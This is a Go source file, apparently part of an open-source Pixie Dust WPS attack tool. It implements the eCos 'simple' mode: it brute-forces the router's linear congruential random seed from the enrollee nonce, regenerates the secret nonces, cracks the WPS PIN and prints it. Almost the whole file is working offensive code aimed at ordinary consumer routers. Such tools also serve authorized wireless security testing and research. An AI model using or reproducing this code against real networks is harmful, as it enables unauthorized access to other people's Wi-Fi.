/*
 * Copyright (C) 2025 Oliver R. Calazans Jeronimo
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <https://www.gnu.org>.
 */

package pixiedust

import "fmt"



func (pda *pixieDustAttack) attackECOSSimple() {
    if len(pda.eNonce) < wpsNonceLen { return }

    fmt.Printf("[i] Trying eCos Simple mode (%d)\n", eCosSimple)

    es := eCosSeed{}
    es.findECOSSimpleSeed(pda.eNonce)

    if !es.found {
        fmt.Println("[X] Nonce doesn't appear to be generated by this mode, skipping...")
        return
    }
    
    pda.memAllocESecret1()
    pda.s1Seed = es.generateECOSSimpleSecret(pda.eSecret1)

    pda.memAllocESecret2()
    pda.s2Seed = es.generateECOSSimpleSecret(pda.eSecret2)

    pda.crackPin()

    if !pda.pinFound() {
        pda.nonceMatch = eCosSimple
        pda.s1Seed     = 0
        pda.s2Seed     = 0
        return
    }
    
    pda.foundMode = eCosSimple
    pda.displayPIN()
}



type eCosSeed struct {
    seed   uint32
    found  bool
}



func (es *eCosSeed) findECOSSimpleSeed(eNonce []byte) {   
    known := uint32(eNonce[0]) << 25

    for counter := uint32(0); counter < 0x02000000; counter++ {
        es.seed  = known | counter
        es.found = true

        for i := 1; i < wpsNonceLen; i++ {
            if eNonce[i] != es.ecosRandSimple() {
                es.found = false
                break
            }
        }

        if es.found { return }
    }   
}



func (es *eCosSeed) ecosRandSimple() byte {
    s := es.seed

    s = s * 1103515245 + 12345    // Permutate seed
    uret := s & 0xffe00000        // Use top 11 bits

    s = s * 1103515245 + 12345        // Permutate seed
    uret += (s & 0xfffc0000) >> 11    // Use top 14 bits

    s = s * 1103515245 + 12345               // Permutate seed
    uret += (s & 0xfe000000) >> (11 + 14)    // Use top 7 bits

    es.seed = s
    return byte(uret & 0xff)
}



func (es *eCosSeed) generateECOSSimpleSecret(secret []byte) uint32 {
    for i := range wpsSecretNonceLen {
        secret[i] = es.ecosRandSimple()
    }
    
    return es.seed
}